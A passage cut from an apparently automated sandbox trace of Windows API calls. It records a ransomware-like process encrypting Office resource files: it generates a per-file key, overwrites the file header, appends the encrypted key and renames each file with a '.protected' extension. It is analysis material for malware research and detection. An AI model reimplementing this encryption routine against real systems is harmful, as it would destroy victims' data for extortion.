(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.808] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.819] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.820] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.820] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.820] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.822] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.822] CloseHandle (hObject=0xd8) returned 1 [0068.822] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected") returned 82 [0068.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.protected")) returned 1 [0068.823] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Windows") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.823] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.823] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.823] lstrcmpW (lpString1="GRINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.823] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.823] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.824] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.824] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.184] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.184] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.184] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.184] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.216] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.216] CloseHandle (hObject=0xd8) returned 1 [0069.217] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected") returned 82 [0069.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.protected")) returned 1 [0069.217] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Windows") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.218] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrIW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.218] lstrcmpW (lpString1="GRINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.218] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.218] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.218] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.231] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.231] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.356] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.356] CloseHandle (hObject=0xd8) returned 1 [0069.357] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected") returned 83 [0069.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.protected")) returned 1 [0069.357] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Windows") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.357] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.357] StrStrIW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.357] lstrcmpW (lpString1="MAPIR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.357] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.358] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.358] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.479] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.479] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.480] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.480] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.480] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.480] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.482] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.500] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.500] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.501] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.501] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.516] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.516] CloseHandle (hObject=0xd8) returned 1 [0069.517] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected") returned 79 [0069.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.protected")) returned 1 [0069.517] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.517] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Windows") returned -1 [0069.517] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files") returned -1 [0069.518] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.518] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.518] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.518] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.518] StrStrIW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.518] lstrcmpW (lpString1="MOR6INT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.518] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.518] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.518] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.520] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.539] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.539] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.540] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.540] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.608] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.608] CloseHandle (hObject=0xd8) returned 1 [0069.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected") returned 82 [0069.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.protected")) returned 1 [0069.609] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.609] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.610] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.610] lstrcmpW (lpString1="MSOINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.610] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.624] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.624] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.625] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.625] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.626] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.626] CloseHandle (hObject=0xd8) returned 1 [0069.627] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected") returned 81 [0069.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.protected")) returned 1 [0069.628] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Windows") returned -1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0069.628] lstrcmpiW 